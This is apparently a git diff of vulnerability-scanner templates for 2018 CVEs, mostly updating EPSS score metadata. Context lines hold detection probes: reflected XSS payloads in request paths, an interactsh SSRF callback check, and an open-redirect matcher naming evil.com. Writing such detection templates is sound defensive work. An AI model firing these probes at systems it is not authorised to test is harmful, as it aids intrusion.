a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - epss-percentile: 0.85024 + epss-percentile: 0.84999 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502207252d44adac513fe7c926f32e50a0c98ef218c6f626af5b5e83e2b6b51d68656022100a2edf5956c7a69f4b7932143cbe7c5db5471a65fb3f0d7a100fa89456229390f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207252d44adac513fe7c926f32e50a0c98ef218c6f626af5b5e83e2b6b51d68656022100a2edf5956c7a69f4b7932143cbe7c5db5471a65fb3f0d7a100fa89456229390f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 0d297d2317..8582c8021e 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.97149 - epss-percentile: 0.99748 + epss-percentile: 0.99749 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index e31ec1a179..b8026f66a7 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.05086 - epss-percentile: 0.92088 + epss-percentile: 0.92074 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -37,7 +37,6 @@ http: GET /session/login HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -55,4 +54,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d5104994ecb6f523e26678db3c60c1014d37e9e733484af74beecdfa6ed5a85202204f13b4b5e32ff2200ce71ef123b54e009d1e0be223ef64379906e0c4dbb843e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d5104994ecb6f523e26678db3c60c1014d37e9e733484af74beecdfa6ed5a85202204f13b4b5e32ff2200ce71ef123b54e009d1e0be223ef64379906e0c4dbb843e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 37389e0107..e86e6e9532 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16133 cwe-id: CWE-22 epss-score: 0.05113 - epss-percentile: 0.92108 + epss-percentile: 0.92093 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 03abdf2e1c..37ab5d9eb2 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48607 + epss-percentile: 0.48579 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094020c50210be241b04ffc3ffae7a79eb86244a38b6b3c3ee8254290575d9d190221008a7cf47db6de5bca733d11b7047fdeff896b6406369ecbd7f5060a35ca486838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210094020c50210be241b04ffc3ffae7a79eb86244a38b6b3c3ee8254290575d9d190221008a7cf47db6de5bca733d11b7047fdeff896b6406369ecbd7f5060a35ca486838:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 5b8fb1954e..0aacb4d73f 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - epss-percentile: 0.83975 + epss-percentile: 0.83951 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a00473045022100fc50bc47fafdb1870b7be9109c51c31f2efd78531e88527f2533517e6d661b1202202e2930e639d992627792b94fc9009e63824fc031c28ee62e9da91779637484d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fc50bc47fafdb1870b7be9109c51c31f2efd78531e88527f2533517e6d661b1202202e2930e639d992627792b94fc9009e63824fc031c28ee62e9da91779637484d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 2947eb0103..8d90008fc9 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.18435 - epss-percentile: 0.95692 + epss-percentile: 0.95688 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 0f1219648e..09da4ea395 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16283 cwe-id: CWE-22 epss-score: 0.07867 - epss-percentile: 0.93555 + epss-percentile: 0.93552 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 075716b5d6..1ae96889c8 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.16221 - epss-percentile: 0.95456 + epss-percentile: 0.95454 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 098d80a3f8..e88078cb19 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.02738 - epss-percentile: 0.89437 + epss-percentile: 0.89434 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a86e545be66f0d84710865e49c8972abe89229279e62d2de38c4fcb56a56408022100a58d2455ab20a991c29570dc8b6a85bf3c5c32f29bb6fbca24eea54dfc6ed668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205a86e545be66f0d84710865e49c8972abe89229279e62d2de38c4fcb56a56408022100a58d2455ab20a991c29570dc8b6a85bf3c5c32f29bb6fbca24eea54dfc6ed668:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 38a533a9f1..b473e06010 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16668 cwe-id: CWE-287 epss-score: 0.00318 - epss-percentile: 0.67197 + epss-percentile: 0.67193 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 490a0046304402201d9a6f3cfe471593bc2b1d2d2dfc2e94c38c350bab4b42f15aaa8bbd61c0788d022048474112e19d5e73fca3ee012c4203d20e74c0d8be0280ddb2464ae4c9c4e035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201d9a6f3cfe471593bc2b1d2d2dfc2e94c38c350bab4b42f15aaa8bbd61c0788d022048474112e19d5e73fca3ee012c4203d20e74c0d8be0280ddb2464ae4c9c4e035:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 1c1d1c47d1..e353e47254 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16670 cwe-id: CWE-287 epss-score: 0.00169 - epss-percentile: 0.53842 + epss-percentile: 0.53818 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - "" - "Reader.STATUS" condition: and -# digest: 4a0a00473045022004a64d15ad1a6a98b0f4599e13c2cf0f0fe0d842d2c4dbb6aa333a2e6c252746022100c631949ef971ee1738002e83f1a7ccc8924254ab98ddf723b14740c83e2b4551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022004a64d15ad1a6a98b0f4599e13c2cf0f0fe0d842d2c4dbb6aa333a2e6c252746022100c631949ef971ee1738002e83f1a7ccc8924254ab98ddf723b14740c83e2b4551:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index cd2f773a80..94f9eb9f82 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16671 cwe-id: CWE-200 epss-score: 0.00224 - epss-percentile: 0.60573 + epss-percentile: 0.60549 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a0047304502206c6e4e31ce4dcf223eb871e1c9ac303e6a97e47341223304f95460d68e85f2ee022100baccb41f87648ded2ec0b0aed36f88ae47e7a44914f45169926fb65a0b75565a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206c6e4e31ce4dcf223eb871e1c9ac303e6a97e47341223304f95460d68e85f2ee022100baccb41f87648ded2ec0b0aed36f88ae47e7a44914f45169926fb65a0b75565a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index af6d76ee4d..464755fced 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-16716 cwe-id: CWE-22 epss-score: 0.00544 - epss-percentile: 0.7479 + epss-percentile: 0.74786 cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e48b02958b7bb5941393c5bb6c0459e1a21570271838df536c25ce80f298936f022100a9d05d03fd208bc7d24b7d600ef082376d6a65c59a11ead848cf4d4ef83fc482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e48b02958b7bb5941393c5bb6c0459e1a21570271838df536c25ce80f298936f022100a9d05d03fd208bc7d24b7d600ef082376d6a65c59a11ead848cf4d4ef83fc482:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index b73c120e31..9b4492c923 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16761 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.2851 + epss-percentile: 0.28476 cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100a0e19445882525ab00c677357b19cbe6d29d1804148239e08f7785ea4b1f7821022100b49236fe0f4cfb39457b63610b50986fbd335e3b8360743daddd8579b586b2a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a0e19445882525ab00c677357b19cbe6d29d1804148239e08f7785ea4b1f7821022100b49236fe0f4cfb39457b63610b50986fbd335e3b8360743daddd8579b586b2a3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index c35850a09e..761db60dfa 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16763 cwe-id: CWE-74 epss-score: 0.83439 - epss-percentile: 0.9813 + epss-percentile: 0.98134 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 45da823add..ca4674112d 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16979 cwe-id: CWE-113 epss-score: 0.00118 - epss-percentile: 0.45725 + epss-percentile: 0.45709 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220491533cbb5d738cb88941bba0fa84b2b6611b8b75dae90352e37b560f1c1a6b0022100d53cdbed6cdbe4f3bfcea59a3746ac3a04024225bd6ff113f45a1faa5ba39d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220491533cbb5d738cb88941bba0fa84b2b6611b8b75dae90352e37b560f1c1a6b0022100d53cdbed6cdbe4f3bfcea59a3746ac3a04024225bd6ff113f45a1faa5ba39d0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index f649e4725e..8c2db1157d 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-17153 cwe-id: CWE-287 epss-score: 0.92144 - epss-percentile: 0.98687 + epss-percentile: 0.98691 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 34e306fe9d..41145b914a 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 - epss-percentile: 0.99642 + epss-percentile: 0.99645 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index d49cc96fde..b7b69a7757 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - epss-percentile: 0.98055 + epss-percentile: 0.9806 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index e8a3e91d6c..f6d6caab63 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45725 + epss-percentile: 0.45709 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true @@ -40,4 +40,5 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4a0a00473045022100f84e4f364259deaccd97f4a085912903819c95613cd2ba58ac166c628a97416d02207343e70b5ff792ee117389a907f5907be57bbc71fe29004ac328ba4c2966e253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f84e4f364259deaccd97f4a085912903819c95613cd2ba58ac166c628a97416d02207343e70b5ff792ee117389a907f5907be57bbc71fe29004ac328ba4c2966e253:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 9faea89572..5d0468ff7f 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.10458 - epss-percentile: 0.9443 + epss-percentile: 0.94426 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 233dc83832..bdde90bfcc 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00092 - epss-percentile: 0.3898 + epss-percentile: 0.38928 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and -# digest: 490a00463044022033fcbbe6ddf1bb0e345aee64a2cc1a68cbc5ed47c976f8715c605d5f2f7b06730220080a00ba50197c8bfa03666bd393ca954990cde397c654686298a1aa19db2da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022033fcbbe6ddf1bb0e345aee64a2cc1a68cbc5ed47c976f8715c605d5f2f7b06730220080a00ba50197c8bfa03666bd393ca954990cde397c654686298a1aa19db2da8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 8b1a4c09d6..aa38885765 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.96359 - epss-percentile: 0.99422 + epss-score: 0.96515 + epss-percentile: 0.99482 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index df67689c12..3ca7678ede 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97126 - epss-percentile: 0.99735 + epss-percentile: 0.99736 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 8bcdbeee9f..15834fe1b9 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40579 + epss-percentile: 0.40523 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3623c804b0b7aec62383cd2957095128cd594aadfe35af65b0ce68b713b3a2a0221008ae9e93c7c26ac034dcee695e4a3d33f76dc7091f42ea25f86b4334f9b143bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d3623c804b0b7aec62383cd2957095128cd594aadfe35af65b0ce68b713b3a2a0221008ae9e93c7c26ac034dcee695e4a3d33f76dc7091f42ea25f86b4334f9b143bcd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 65a0407521..f1ddf7f2e3 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54842 + epss-percentile: 0.54825 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200eb2b09dad4976972814082c320c940b81a1cb63ef0a1b12a27b0c280da277a602200c28514873f66feee23fd149e4ef66057ce7a124795e8f8544a16e4bf44d9851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200eb2b09dad4976972814082c320c940b81a1cb63ef0a1b12a27b0c280da277a602200c28514873f66feee23fd149e4ef66057ce7a124795e8f8544a16e4bf44d9851:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 53bcb753e8..f1ba3cfde9 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18775 cwe-id: CWE-79 epss-score: 0.00157 - epss-percentile: 0.52098 + epss-percentile: 0.52076 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa4b201b14ebc9882244817e66e2d7df4901bfddfe9639c3e3a10d3ea1dc37c0022100a5e90100e2d54347d4d9232a4829782ab451af8ac63510aa230feb37bf1c40c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fa4b201b14ebc9882244817e66e2d7df4901bfddfe9639c3e3a10d3ea1dc37c0022100a5e90100e2d54347d4d9232a4829782ab451af8ac63510aa230feb37bf1c40c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 6f6aef9cb3..8ff1324e0c 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00224 - epss-percentile: 0.60606 + epss-percentile: 0.60583 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206ef08fdc6cc3a1173a36cb060f2a6e106513bc6166b305510f7ddd8f718016240220110bc680e138dc84b8056a6c20e7b22c7ae813a83ff8f87d3fee80222ad589a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206ef08fdc6cc3a1173a36cb060f2a6e106513bc6166b305510f7ddd8f718016240220110bc680e138dc84b8056a6c20e7b22c7ae813a83ff8f87d3fee80222ad589a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 14aa9d2f6f..3a8d465e16 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.95125 - epss-percentile: 0.99128 + epss-percentile: 0.99129 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022049864e7b29a3f90c673be0df43e36f05c7f509e88ec096424dbdef7dbf40298f0220373ef5623e247e268de543fa2fe9159d95aef9dccc85cfa077c7715baaa5df12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022049864e7b29a3f90c673be0df43e36f05c7f509e88ec096424dbdef7dbf40298f0220373ef5623e247e268de543fa2fe9159d95aef9dccc85cfa077c7715baaa5df12:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index b44153b846..86e5e80d4c 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18809 cwe-id: CWE-22 epss-score: 0.46465 - epss-percentile: 0.97096 + epss-percentile: 0.97094 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index bfca94b587..028442bde1 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.09538 - epss-percentile: 0.94161 + epss-percentile: 0.94157 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 4b0a00483046022100dba0204980b7734ef9c1b29cf936d6013d4688f59972d2539399240c588aad2f022100e7d6a54cc5852d42e41ec7b9fd1d6b30708ad92020cc42323b6d6aa6b96ab5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dba0204980b7734ef9c1b29cf936d6013d4688f59972d2539399240c588aad2f022100e7d6a54cc5852d42e41ec7b9fd1d6b30708ad92020cc42323b6d6aa6b96ab5c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index f3ad6269bb..69a3b66f81 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - epss-percentile: 0.33873 + epss-percentile: 0.3382 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -38,7 +38,6 @@ http: GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -54,4 +53,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019f5052fca56b9a9a5e2bb33ca22373f6683a999f3013a256a726b598e5dde670221009b3b1ca1a43ed33d2f2c1881c1dbc3ddde33921cbba11f039541972b54e6d9c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022019f5052fca56b9a9a5e2bb33ca22373f6683a999f3013a256a726b598e5dde670221009b3b1ca1a43ed33d2f2c1881c1dbc3ddde33921cbba11f039541972b54e6d9c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 62f3201537..a9b2b5d3fb 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19287 cwe-id: CWE-79 epss-score: 0.59729 - epss-percentile: 0.97451 + epss-percentile: 0.9745 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -42,7 +42,6 @@ http: GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=">alert(1337) HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word @@ -47,4 +46,5 @@ http: - type: status status: - 200 -# digest: 